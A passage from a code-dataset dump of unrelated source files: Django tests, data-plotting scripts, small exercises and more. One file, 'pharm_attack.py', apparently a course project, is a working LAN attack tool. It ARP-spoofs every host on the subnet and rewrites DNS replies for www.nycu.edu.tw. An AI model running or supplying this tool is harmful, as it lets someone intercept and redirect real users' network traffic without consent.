confusion_matrix(y_test, y_pred)\r\n\r\n#ROC_AUC \r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.metrics import roc_auc_score\r\nfpr, tpr, thresholds = roc_curve(y_test, y_pred)\r\nroc_auc = auc(fpr, tpr)\r\n\r\nplt.figure()\r\nplt.plot(fpr, tpr, color='darkorange', lw=1, label='ROC curve (area = %0.2f)' % roc_auc)\r\nplt.plot([0, 1], [0, 1], color='navy', lw=1, linestyle='--')\r\nplt.xlim([0.0, 1.0])\r\nplt.ylim([0.0, 1.05])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Receiver operating characteristic')\r\nplt.legend(loc=\"lower right\")\r\nplt.show()\r\n","sub_path":"DT.py","file_name":"DT.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"159454867","text":"import re\nimport sys\ns = \"\"\"blabla is a tandem repetition\n123123 is good too\ngo go\naaa\"\"\"\ns = s.split('\\n')\npattern = r'(\\b\\w+)\\1\\b'\nfor line in sys.stdin:\n line = line.rstrip()\n n = re.match(pattern,line)\n if n and len (n.regs)>1:\n x0 = n.regs[0]\n x1 = n.regs[1]\n if line[x1[0]:x1[1]]*2 == line[x0[0]:x0[1]]:\n print (line)","sub_path":"Stepik/36/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"212784283","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('entrega', '0005_auto_20150917_1551'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='entregador',\n options={'verbose_name_plural': 'Entregadores'},\n ),\n migrations.RenameField(\n model_name='pedido',\n old_name='data_hora',\n new_name='entrada',\n ),\n migrations.AddField(\n model_name='pedido',\n name='partida',\n field=models.DateTimeField(null=True),\n ),\n ]\n","sub_path":"pizzaproj/pizzaria/entrega/migrations/0006_auto_20150917_1646.py","file_name":"0006_auto_20150917_1646.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"492200710","text":"from corsheaders.middleware import CorsMiddleware\nfrom django.conf import settings\nfrom django.contrib.auth.middleware import AuthenticationMiddleware\nfrom django.contrib.sessions.middleware import SessionMiddleware\nfrom django.http import Http404\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\nfrom django.urls.base import get_urlconf, set_urlconf\nfrom django_dynamic_fixture import get\n\nfrom readthedocs.core.middleware import SubdomainMiddleware\nfrom readthedocs.projects.models import Domain, Project, ProjectRelationship\nfrom readthedocs.rtd_tests.utils import create_user\n\n\n@override_settings(USE_SUBDOMAIN=True)\nclass MiddlewareTests(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = SubdomainMiddleware()\n self.url = '/'\n self.owner = create_user(username='owner', password='test')\n self.pip = get(\n Project,\n slug='pip',\n users=[self.owner],\n privacy_level='public'\n )\n\n def process_request_auth_middleware(self, request):\n SessionMiddleware().process_request(request)\n AuthenticationMiddleware().process_request(request)\n\n def test_failey_cname(self):\n self.assertFalse(Domain.objects.filter(domain='my.host.com').exists())\n request = self.factory.get(self.url, HTTP_HOST='my.host.com')\n self.process_request_auth_middleware(request)\n r = self.middleware.process_request(request)\n self.assertEqual(r.status_code, 404)\n self.assertEqual(request.cname, True)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_proper_subdomain(self):\n request = self.factory.get(self.url, HTTP_HOST='pip.readthedocs.org')\n self.middleware.process_request(request)\n self.assertEqual(request.subdomain, True)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_wrong_subdomain(self):\n http_host = 'xyz-wrong-sub-domain-xyz.readthedocs.org'\n request = self.factory.get(self.url, HTTP_HOST=http_host)\n with self.assertRaises(Http404):\n self.middleware.process_request(request)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_restore_urlconf_after_request(self):\n \"\"\"\n The urlconf attribute for the current thread\n should remain intact after each request,\n When is set to None it means 'use default from settings'.\n \"\"\"\n set_urlconf(None)\n urlconf = get_urlconf()\n self.assertIsNone(urlconf)\n\n self.client.get(self.url, HTTP_HOST='pip.readthedocs.org')\n urlconf = get_urlconf()\n self.assertIsNone(urlconf)\n\n self.client.get(self.url)\n urlconf = get_urlconf()\n self.assertIsNone(urlconf)\n\n self.client.get(self.url, HTTP_HOST='pip.readthedocs.org')\n urlconf = get_urlconf()\n self.assertIsNone(urlconf)\n\n @override_settings(PRODUCTION_DOMAIN='prod.readthedocs.org')\n def test_subdomain_different_length(self):\n request = self.factory.get(\n self.url, HTTP_HOST='pip.prod.readthedocs.org'\n )\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.subdomain, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_domain_object(self):\n self.domain = get(Domain, domain='docs.foobar.com', project=self.pip)\n\n request = self.factory.get(self.url, HTTP_HOST='docs.foobar.com')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.domain_object, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_domain_object_missing(self):\n self.domain = get(Domain, domain='docs.foobar2.com', project=self.pip)\n request = self.factory.get(self.url, HTTP_HOST='docs.foobar.com')\n self.process_request_auth_middleware(request)\n r = self.middleware.process_request(request)\n self.assertEqual(r.status_code, 404)\n\n def test_request_header(self):\n request = self.factory.get(\n self.url, HTTP_HOST='some.random.com', HTTP_X_RTD_SLUG='pip'\n )\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.cname, True)\n self.assertEqual(request.rtdheader, True)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_proper_cname_uppercase(self):\n get(Domain, project=self.pip, domain='pip.random.com')\n request = self.factory.get(self.url, HTTP_HOST='PIP.RANDOM.COM')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.cname, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_request_header_uppercase(self):\n request = self.factory.get(\n self.url, HTTP_HOST='some.random.com', HTTP_X_RTD_SLUG='PIP'\n )\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, settings.SUBDOMAIN_URLCONF)\n self.assertEqual(request.cname, True)\n self.assertEqual(request.rtdheader, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_use_subdomain(self):\n domain = 'doesnt.exists.org'\n get(Domain, project=self.pip, domain=domain)\n request = self.factory.get(self.url, HTTP_HOST=domain)\n res = self.middleware.process_request(request)\n self.assertIsNone(res)\n self.assertEqual(request.slug, 'pip')\n self.assertTrue(request.domain_object)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_long_bad_subdomain(self):\n domain = 'www.pip.readthedocs.org'\n request = self.factory.get(self.url, HTTP_HOST=domain)\n self.process_request_auth_middleware(request)\n res = self.middleware.process_request(request)\n self.assertEqual(res.status_code, 400)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_long_subdomain(self):\n domain = 'some.long.readthedocs.org'\n request = self.factory.get(self.url, HTTP_HOST=domain)\n self.process_request_auth_middleware(request)\n res = self.middleware.process_request(request)\n self.assertIsNone(res)\n\n\nclass TestCORSMiddleware(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = CorsMiddleware()\n self.url = '/api/v2/search'\n self.owner = create_user(username='owner', password='test')\n self.project = get(\n Project, slug='pip',\n users=[self.owner], privacy_level='public',\n mail_language_project=None,\n )\n self.subproject = get(\n Project,\n users=[self.owner],\n privacy_level='public',\n mail_language_project=None,\n )\n self.relationship = get(\n ProjectRelationship,\n parent=self.project,\n child=self.subproject,\n )\n self.domain = get(Domain, domain='my.valid.domain', project=self.project)\n\n def test_proper_domain(self):\n request = self.factory.get(\n self.url,\n {'project': self.project.slug},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n\n def test_invalid_domain(self):\n request = self.factory.get(\n self.url,\n {'project': self.project.slug},\n HTTP_ORIGIN='http://invalid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n\n def test_valid_subproject(self):\n self.assertTrue(\n Project.objects.filter(\n pk=self.project.pk,\n subprojects__child=self.subproject,\n ).exists(),\n )\n request = self.factory.get(\n self.url,\n {'project': self.subproject.slug},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n\n def test_apiv2_endpoint_allowed(self):\n request = self.factory.get(\n '/api/v2/version/',\n {'project__slug': self.project.slug, 'active': True},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n\n def test_apiv2_endpoint_not_allowed(self):\n request = self.factory.get(\n '/api/v2/version/',\n {'project__slug': self.project.slug, 'active': True},\n HTTP_ORIGIN='http://invalid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n\n # POST is not allowed\n request = self.factory.post(\n '/api/v2/version/',\n {'project__slug': self.project.slug, 'active': True},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n","sub_path":"readthedocs/rtd_tests/tests/test_middleware.py","file_name":"test_middleware.py","file_ext":"py","file_size_in_byte":9687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"295218308","text":"from django.urls import path\nfrom . import views\n\napp_name = 'usersignup'\nurlpatterns = [\n path('', views.index, name='homepage'),\n path('login/', views.login, name='login_page'),\n path('signup/', views.create_profile, name='create_profile'),\n path('signup/final', views.create_web_profile, name='web_profile_create'),\n path('welcome/', views.redirect_page, name='welcome_page')\n]","sub_path":"usersignup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"223067912","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom lxml import html\n\nfrom parsers.team_parser import TeamParser\nfrom parsers.game_parser import GameParser\n\n\ndef test_2016():\n\n url = \"http://www.nhl.com/scores/htmlreports/20162017/ES020776.HTM\"\n\n tp = TeamParser(get_data(url))\n tp.load_data()\n tp.create_teams()\n\n gp = GameParser(get_data(url), None)\n gp.load_data()\n gp.create_game(tp.teams)\n\n assert gp.game_data == [\n 'Saturday, February 4, 2017', 'Attendance 19,092 at Amalie Arena',\n 'Start 7:08 EST; End 10:09 EST', 'Game 0776', 'Final']\n\n\ndef test_playoff_game():\n\n url = \"http://www.nhl.com/scores/htmlreports/20122013/ES030325.HTM\"\n\n tp = TeamParser(get_data(url))\n tp.load_data()\n tp.create_teams()\n\n gp = GameParser(2, get_data(url), None)\n gp.load_data()\n gp.create_game(tp.teams)\n\n assert gp.game_data == [\n 'Saturday, June 8, 2013', 'Attendance 22,237 at United Center',\n 'Start 7:20 CDT; End 11:02 CDT', 'Game 0325', 'Final']\n\n\ndef get_data(url):\n r = requests.get(url)\n return html.fromstring(r.text)\n\n\nif __name__ == '__main__':\n\n test_2016()\n test_playoff_game()\n","sub_path":"test_game_parser.py","file_name":"test_game_parser.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"583232835","text":"# April 2019\n# Read the matlab file\n# Write a text file\n# Plot in GMT\n\n\"\"\"\nstations_used\nLats\nslip_rate\nel\nnd\nKern\nsig_dUv\nLons\ndEv\nnd_ll\nsig_dNv\ndUv\ndNv\nsig_dEv\n\"\"\"\n\nimport numpy as np \nimport scipy.io\nimport sys\n\ndef configure_and_read():\n\tmatlab_file=\"forKathryn.mat\";\n\toutput_file=\"resolution.txt\";\n\tprint(\"Making text files for %s \" % (matlab_file) );\n\treturn matlab_file, output_file;\n\ndef read_matlab_file(matlab_file):\n\tmat = scipy.io.loadmat(matlab_file);\n\treturn mat;\n\ndef write_gmt(mat, output_file):\n\n\t# model_fit = np.dot(mat['Kern'],mat['slip_rate']);\n\t# ofile_model = open(output_file_model, 'w');\n\t# for i in range(len(mat['Lons'])):\n\t# \tofile_model.write(\"%f %f %f %f\\n\" % (mat['Lons'][i], mat['Lats'][i], model_fit[i*3], model_fit[i*3+1] ) )\n\t# ofile_model.close();\n\n\n\tmedian_Kern=np.array(mat['median_Kern']).T;\n\tmedian_Kern_area_adjusted=np.array(mat['median_Kern_area_adjusted']).T;\t\n\tarea = np.array(mat['a']).T;\n\tmean_area=np.mean(area);\n\n\t# median_area_adjusted = [(median_Kern[i]/area[i])*mean_area for i in range(len(median_Kern))];\n\n\t# print(np.max(median_Kern)*1000)\n\n\n\tofile=open(output_file,'w');\n\tfor i in range(len(median_Kern)):\n\t\tofile.write(\">-Z%f\\n\" % (median_Kern[i]*1000) ); # in mm\n\t\t# ofile.write(\">-Z%f\\n\" % (median_area_adjusted[i]*1000) ); # in mm\n\t\tfirst_index=mat['el'][i][0]-1;\n\t\tsecond_index=mat['el'][i][1]-1;\n\t\tthird_index=mat['el'][i][2]-1;\n\t\tlimit=42;\n\t\tif mat['nd_ll'][first_index][1]>limit or mat['nd_ll'][second_index][1]>limit or mat['nd_ll'][third_index][1]>limit:\n\t\t\tcontinue;\n\t\tofile.write(\"%f %f\\n\" % (mat['nd_ll'][first_index][0], mat['nd_ll'][first_index][1]) ) # the first point in the triangle \n\t\tofile.write(\"%f %f\\n\" % (mat['nd_ll'][second_index][0], mat['nd_ll'][second_index][1]) ) # the second point in the triangle\n\t\tofile.write(\"%f %f\\n\" % (mat['nd_ll'][third_index][0], mat['nd_ll'][third_index][1]) ) # the third point in the triangle\n\tofile.close();\n\treturn;\n\nif __name__==\"__main__\":\n\tmatlab_file, output_file=configure_and_read();\n\tmat = read_matlab_file(matlab_file);\n\twrite_gmt(mat, output_file);\n\n","sub_path":"Models/Model_Resolution/mat2gmt.py","file_name":"mat2gmt.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"599951021","text":"'''Дан текст з цифр і малих латинських літер, за яким слідує крапка. Визначити яких\r\nбукв - голосних або приголосних більше в цьому тексті. Результат вивести на екран.'''\r\nwhile True:\r\n s=input('Write text:')\r\n vowels='a','e','y','o','u','i'\r\n cons='q','w','r','t','p','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m'\r\n if s.count('.')>1:\r\n print('Only 1 point in the end of text!')\r\n continue\r\n elif s.count('.')<1:\r\n print('Write point in the end of text!')\r\n continue\r\n vow=0\r\n con=0\r\n sym=0\r\n for i in range(len(s)):\r\n for j in range(len(s[i])):\r\n if s[i][j] in vowels:\r\n vow+=1\r\n elif s[i][j] in cons:\r\n con+=1\r\n else:\r\n sym+=1\r\n if vow>con:\r\n print('Vowels value is more than consonants')\r\n elif con>vow:\r\n print('Consonants value is more than vowels')\r\n else:\r\n print('Value of vowels and consonants is equally')\r\n print(f'Vowels:{vow} \\nConsonants:{con}\\nSymbols:{sym}')\r\n c=input('Press 1 to rerun or anything else to close program')\r\n if c=='1':\r\n continue\r\n else:\r\n break\r\n \r\n \r\n","sub_path":"5.1.py","file_name":"5.1.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"542519772","text":"from models.models import Taboola\n\ndef main(request):\n data = request.get_json(silent=True)\n print(data)\n\n if \"table\" in data:\n response = Taboola.factory(\n table=data[\"table\"],\n start=data.get(\"start\"),\n end=data.get(\"end\"),\n ).run()\n else:\n raise ValueError(data)\n\n print(response)\n return response\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"53441403","text":"#!/usr/bin/env python3\n\nimport scapy.all as scapy\n#from scapy.all import *\nimport time\nimport sys\nimport argparse\nimport socket, struct\nimport subprocess\nimport os\nimport threading\nfrom netfilterqueue import NetfilterQueue # for putting the packet into queue than modified it\nimport netifaces\n\ndef get_mac(ip):\n for a in range(10):\n arp_request = scapy.ARP(pdst = ip)\n broadcast = scapy.Ether(dst =\"ff:ff:ff:ff:ff:ff\")\n arp_request_broadcast = broadcast / arp_request\n answered_list, unanswer = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)\n if len(answered_list) == 0:\n print(\"no find\")\n continue\n else:\n return answered_list[0][1].hwsrc\n print(\"Can't find mac address\")\n os.exit(1)\n\n # return 'b4:6b:fc:1d:e8:9f' # error here, use this for temp\n\ndef spoof(target_ip, spoof_ip, target_mac):\n packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = target_mac, psrc = spoof_ip)\n \n scapy.send(packet, verbose = False)\n\ndef restore(destination_ip, source_ip):\n destination_mac = get_mac(destination_ip)\n source_mac = get_mac(source_ip)\n packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac)\n scapy.send(packet, verbose = False)\n\ndef translate_to_slash(netmask):\n temp = netmask.rsplit('.')\n number = 0\n for i in range(4):\n number = number << 8\n number += int(temp[i])\n slash = 0\n for i in range(32):\n if number % 2 == 1:\n slash = i\n break\n number = number >> 1\n return 32 - slash\n\n\n# def get_local_info():\n# interfaces = netifaces.ifaddresses('enp0s3')\n# # dictionary\n# normal_internet = interfaces[netifaces.AF_INET][0]\n# address = normal_internet['addr']\n# netmask = normal_internet['netmask']\n# broadcast = normal_internet['broadcast']\n# # slash = IPAddress(netmask).netmask_bits()\n# slash = translate_to_slash(netmask)\n# # obtain gateway\n# gws = netifaces.gateways()\n# gw = gws['default'][netifaces.AF_INET][0]\n \n# return address, netmask, broadcast, str(slash), gw\n\ndef get_local_info():\n \n interfaces = netifaces.interfaces()\n\n for interface_name in interfaces:\n interface = netifaces.ifaddresses(interface_name)\n try:\n # dictionary\n normal_internet = interface[netifaces.AF_INET][0]\n address = normal_internet['addr']\n netmask = normal_internet['netmask']\n broadcast = normal_internet['broadcast']\n # slash = IPAddress(netmask).netmask_bits()\n slash = translate_to_slash(netmask)\n # obtain gateway\n gws = netifaces.gateways()\n gw = gws['default'][netifaces.AF_INET][0]\n return address, netmask, broadcast, str(slash), gw\n except KeyError:\n print(\"this interface: \", interface_name, \" isn't feasible\")\n continue\n\ndef getDevice(ip, gw):\n request = scapy.ARP()\n request.pdst = ip\n broadcast = scapy.Ether()\n\n broadcast.dst = 'ff:ff:ff:ff:ff:ff'\n\n request_broadcast = broadcast / request\n clients = scapy.srp(request_broadcast, timeout=10, verbose=1)[0]\n\n result = []\n\n print('Available devices')\n print('----------------------------')\n print('IP MAC')\n print('----------------------------')\n for element in clients:\n if element[1].psrc != gw:\n print(element[1].psrc + \" \" + element[1].hwsrc)\n result_dict = {\"ip\": element[1].psrc, \"mac\": element[1].hwsrc}\n result.append(result_dict)\n print(' ')\n\n return result\n\n# Modifying the DNSRR packet\ndef pharming(pkt):\n # Change the queued packet to scapy packet payload\n data=scapy.IP(pkt.get_payload())\n # If the packet is really the DNS query response packet\n if data.haslayer(scapy.DNSRR):\n # If the query website is the target website\n # print(str(data[scapy.DNSQR].qname))\n if \"www.nycu.edu.tw\" in str(data[scapy.DNSQR].qname):\n # Change the query IP to target server IP\n ans=scapy.DNSRR(rrname=data[scapy.DNSQR].qname, rdata=\"140.113.207.246\")\n data[scapy.DNS].an=ans # Save the modified IP into Scapy packet\n data[scapy.DNS].ancount=1 # Query answer count = 1\n\n # Delete the check field from IP and UDP header (DNS query use UDP)\n del data[scapy.IP].len\n del data[scapy.IP].chksum\n del data[scapy.UDP].len\n del data[scapy.UDP].chksum\n\n pkt.set_payload(bytes(data)) #Turn the modified scapy packet payload back to original packet type\n # Accept the packet\n pkt.accept()\n\n# Sniff() starter\ndef startPharming():\n # Build up the queue number 0\n os.system(\"iptables -I FORWARD -j NFQUEUE --queue-num 0\")\n print(\"Start pharming...\")\n # Modify the DNS response packet by \"pharming\" function\n queue=NetfilterQueue()\n try:\n # Bind the queue number 0 with \"pharming\" function\n queue.bind(0,pharming)\n # Start queuing the packets\n queue.run()\n except KeyboardInterrupt:\n # Flush the queue number 0\n os.system(\"iptables --flush\")\n\nif __name__ == '__main__':\n\n address, netmask, broadcast, slash, gw = get_local_info()\n\n # print(get_mac('192.168.99.100')) \n result = getDevice(address + '/' + slash, gw)\n\n # target_ip = \"172.20.10.11\" # Enter your target IP\n # gateway_ip = \"192.168.99.1\" # Enter your gateway's IP\n gateway_ip = gw\n\n\n t = threading.Thread(target = startPharming)\n t.setDaemon(True)\n t.start()\n\n try:\n sent_packets_count = 0\n while True:\n for index in result:\n if index['ip'] != gw:\n target_ip = index['ip']\n target_mac = index['mac']\n spoof(target_ip, gateway_ip, target_mac) # cheat on victim to know I am gateway\n spoof(gateway_ip, target_ip, target_mac) # cheat on switch to know I am target\n sent_packets_count = sent_packets_count + 2\n # print(\"\\r[*] Packets Sent \"+str(sent_packets_count), end =\"\")\n # time.sleep(0.5) # Waits for two seconds\n \n except KeyboardInterrupt:\n print(\"\\nCtrl + C pressed.............Exiting\")\n # restore(gateway_ip, target_ip)\n # restore(target_ip, gateway_ip)\n print(\"[-] Arp Spoof Stopped\")\n os.system(\"iptables --flush\")\n t.join()\n print(\"stop thread\")","sub_path":"project2/pharm_attack.py","file_name":"pharm_attack.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"28564575","text":"import pickle\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Conv2D, MaxPool2D, Flatten, LSTM, TimeDistributed\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\nwith open('total.pickle', 'rb') as handle:\n data = pickle.load(handle)\n\n\ndef transformToXy(data):\n X, y = [], []\n for name in data['code']:\n X.extend([i for i in data[name]])\n y.extend([data['label'][name]] * len(data[name]))\n\n return X, y\n\ndef encodeXy(X, y):\n X = np.array(X)\n y = np.array(y)\n y = to_categorical(y, num_classes=len(data['code']))\n return X, y\n\n\nX, y = transformToXy(data)\nX, y = encodeXy(X, y)\nprint(X.shape)\nprint(y)\nX_train, X_test, y_train, y_test = train_test_split(X,\n y.reshape(-1, 1, len(data['code'])),\n test_size=0.2,\n random_state=42\n )\nprint(X_train.shape)\nprint(y_train.shape)\nprint(len(data['code']))\nmodel = Sequential([\n Dense(2048, input_shape=(1, 256), activation='relu'),\n Dropout(0.5),\n Dense(len(data['code']), activation='softmax')\n])\nmodel.compile(optimizer=Adam(),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(X_train, y_train, epochs=35, validation_split=0.2)\nprint(model.predict(X[0].reshape(-1, 1, 256)), y[0])\nprint(model.evaluate(X_test, y_test))\nmodel.save('model.h5')","sub_path":"Voice-Augment/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"639498224","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 27 14:26:06 2017\n\n@author: ansty\n\"\"\"\n\n\nfrom osmread import parse_file, Node\n\n# Loading data from the OSM file.\ndef decode_node_to_csv():\n for entry in parse_file(osm_load_path):\n if (isinstance(entry, Node) and \n 'addr:postcode' in entry.tags and\n 'addr:street' in entry.tags and\n 'addr:postcode' in entry.tags):\n yield entry\n \n#Parsing the osm file into dict\ndef getOpenStreetMapAsDict():\n \n #limit = 20000\n map_osm = {}\n for idx, decoded_node in enumerate(decode_node_to_csv()):\n #uncomment for limit\n# if idx > limit:\n# print(\"limit reached - done reading osm\")\n# return map_osm\n housenumber = \"\"\n try:\n street = decoded_node.tags['addr:street']\n housenumber = decoded_node.tags['addr:housenumber']\n zip_code = decoded_node.tags['addr:postcode']\n lon = decoded_node.lon\n lat = decoded_node.lat\n address_zip = street + \" \" + housenumber + \", \" + str(zip_code)\n gps = [lon,lat]\n map_osm[address_zip] = gps\n except:\n print(\"A osm row just ignored - due error parsing\")\n print(\"done reading osm\")\n return map_osm","sub_path":"assignment_3/osm_handler.py","file_name":"osm_handler.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"514791325","text":"from flask import Flask, render_template, redirect, url_for, request\r\nimport dekorator\r\nimport povrsinaIGrafik\r\nimport genetskiAlgoritam\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template(\"ispitni_zadaci.html\")\r\n\r\n\r\n@app.route('/z1')\r\ndef z1():\r\n poruke = dekorator.mainEntry()\r\n return render_template(\"z1.html\", txt=poruke)\r\n\r\n\r\n@app.route('/z2')\r\ndef z2():\r\n poruka = povrsinaIGrafik.mainEntry()\r\n return render_template(\"z2.html\", txt=poruka)\r\n\r\n@app.route('/nacrtaj')\r\ndef nacrtaj():\r\n povrsinaIGrafik.nacrtaj()\r\n poruka = povrsinaIGrafik.mainEntry()\r\n return render_template(\"z2.html\", txt=poruka)\r\n\r\n\r\n@app.route('/z3')\r\ndef z3():\r\n poruka = genetskiAlgoritam.glavnaPetlja()\r\n return render_template(\"z3.html\", txt=poruka)\r\n\r\n@app.route('/prikaziTackasto')\r\ndef prikaziTackasto():\r\n genetskiAlgoritam.prikazi()\r\n poruka = genetskiAlgoritam.glavnaPetlja()\r\n return render_template(\"z3.html\", txt=poruka)\r\n\r\nif __name__ == '__main__':\r\n app.run()","sub_path":"flask1.py","file_name":"flask1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"215931812","text":"# Exercise 5: This program records the domain name (instead of the\n# address) where the message was sent from instead of who the mail came\n# from (i.e., the whole email address). At the end of the program, print\n# out the contents of your dictionary.\n\nname = 'mbox-short.txt'\nhandle = open(name)\n\ncounts = dict()\n\nfor line in handle:\n if line.startswith('From '):\n email = line.split()[1]\n address = email[email.find('@') + 1:]\n counts[address] = counts.get(address, 0) + 1\n\nprint(counts)","sub_path":"Course2/exercises/exercise9.5.py","file_name":"exercise9.5.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"1806653","text":"from deque import Deque\n\ndef palindrome(string: str) -> bool:\n \"\"\"Returns boolean if input string is a palindrome\n\n Args:\n string (str): input string to check against palindrome\n\n Returns:\n bool: True if palindrome, False if not\n \"\"\"\n d = Deque()\n for ch in string:\n d.addRear(ch)\n \n equal = True\n while d.size() > 1 and equal:\n front = d.removeFront()\n rear = d.removeRear()\n if front != rear:\n equal = False\n return equal\n\ndef main():\n s = \"racecar\"\n assert palindrome(s) == True\n s = \"notapalindrome\"\n assert palindrome(s) == False","sub_path":"deque/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"608877298","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 10 22:30:49 2018\n0.23/1.4\n@author: Windows\n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\n\n\"\"\"\n使用Sift特征点检测和匹配查找场景中特定物体。\n\"\"\"\n\nMIN_MATCH_COUNT = 4 # 至少需要4个健壮特征点\n\nimgname1 = \"003-a.jpg\"\nimgname2 = \"003-b.jpg\"\n\n\nimg1 = cv2.imread(imgname1)\nimg2 = cv2.imread(imgname2)\n\ngray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\ngray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\nsift = cv2.xfeatures2d.SIFT_create()\n\nmatcher = cv2.FlannBasedMatcher(dict(algorithm= 1, trees = 5), {})\n\nkpts1, descs1 = sift.detectAndCompute(gray1, None,)\nkpts2, descs2 = sift.detectAndCompute(gray2, None,)\n\nmatches = matcher.knnMatch(descs1, descs2, 2)\n\nmatches = sorted(matches, key = lambda x:x[0].distance)\n\ngood = [m1 for (m1, m2) in matches if m1.distance < 0.26 * m2.distance]\nprint(len(good))\ncanvas = img2.copy()\n\nif len(good) > MIN_MATCH_COUNT:\n\n src_pts = np.float32([ kpts1[m.queryIdx].pt for m in good ]).reshape(-1,1,2) #获取匹配到的坐标存在np中第一张图\n dst_pts = np.float32([ kpts2[m.trainIdx].pt for m in good ]).reshape(-1,1,2) #获取匹配到的坐标存在np中第二张图\n #print 